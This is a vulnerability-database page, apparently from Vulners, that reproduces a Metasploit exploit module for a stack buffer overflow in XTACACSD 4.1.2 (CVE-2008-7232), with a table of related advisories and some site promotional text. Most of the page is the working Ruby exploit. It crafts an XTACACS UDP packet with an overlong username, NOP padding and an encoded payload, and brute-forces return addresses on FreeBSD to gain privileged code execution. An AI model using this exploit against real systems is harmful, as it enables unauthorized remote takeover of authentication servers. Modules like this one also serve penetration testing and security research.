Lucene search
K

XTACACSD report() Buffer Overflow

🗓️ 02 Feb 2008 16:06:39Reported by MC <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 23 Views

XTACACSD report() Buffer Overflow CVE-2008-723

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-7232
29 May 201815:50
circl
CVE
CVE-2008-7232
14 Sep 200914:00
cve
Cvelist
CVE-2008-7232
14 Sep 200914:00
cvelist
Exploit DB
Xtacacsd 4.1.2 - &#039;report()&#039; Remote Buffer Overflow (Metasploit)
8 Jan 200800:00
exploitdb
Exploit DB
XTACACSD <= 4.1.2 report Buffer Overflow
9 May 201000:00
exploitdb
exploitpack
Xtacacsd 4.1.2 - report() Remote Buffer Overflow (Metasploit)
8 Jan 200800:00
exploitpack
NVD
CVE-2008-7232
14 Sep 200914:30
nvd
Packet Storm
XTACACSD 4.1.2 Buffer Overflow
27 Oct 200900:00
packetstorm
Prion
Buffer overflow
14 Sep 200914:30
prion
seebug.org
Xtacacsd &lt;= 4.1.2 report Buffer Overflow
8 Jan 200800:00
seebug
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Brute

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'XTACACSD report() Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in XTACACSD <= 4.1.2. By
        sending a specially crafted XTACACS packet with an overly long
        username, an attacker may be able to execute arbitrary code.
      },
      'Author'         => 'MC',
      'References'     =>
        [
          ['CVE', '2008-7232'],
          ['OSVDB', '58140'],
          ['URL', 'http://aluigi.altervista.org/adv/xtacacsdz-adv.txt'],
        ],
      'Payload'        =>
        {
          'Space'    => 175,
          'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20",
          'StackAdjustment' => -3500,
          'PrependEncoder' => "\x83\xec\x7f",
          'DisableNops'   =>  'True',
        },
      'Platform'       => 'bsd',
      'Arch'           => ARCH_X86,
      'Targets'        =>
        [
          ['FreeBSD 6.2-Release Bruteforce',
            {'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0xbfbfea00 },
                'Stop'  => { 'Ret' => 0xbfbfef00 },
                'Step'  => 24,
              }
            },
          ],
        ],
      'Privileged'     => true,
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2008-01-08'))

    register_options([Opt::RPORT(49)])
  end

  def brute_exploit(address)
    connect_udp

    sploit =  "\x80" # Version
    sploit << "\x05" # Type: Connect
    sploit << "\xff\xff" # Nonce
    sploit << "\xff" # Username length
    sploit << "\x00" # Password length
    sploit << "\x00" # Response
    sploit << "\x00" # Reason
    sploit << "\xff\xff\xff\xff" # Result 1
    sploit << "\xff\xff\xff\xff" # Destination address
    sploit << "\xff\xff" # Destination port
    sploit << "\xff\xff" # Line
    sploit << "\x00\x00\x00\x00" # Result 2
    sploit << "\x00\x00" # Result 3
    sploit << make_nops(238 - payload.encoded.length)
    sploit << payload.encoded + [address['Ret']].pack('V')

    print_status("Trying target #{target.name} #{"%.8x" % address['Ret']}...")
    udp_sock.put(sploit)

    disconnect_udp
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation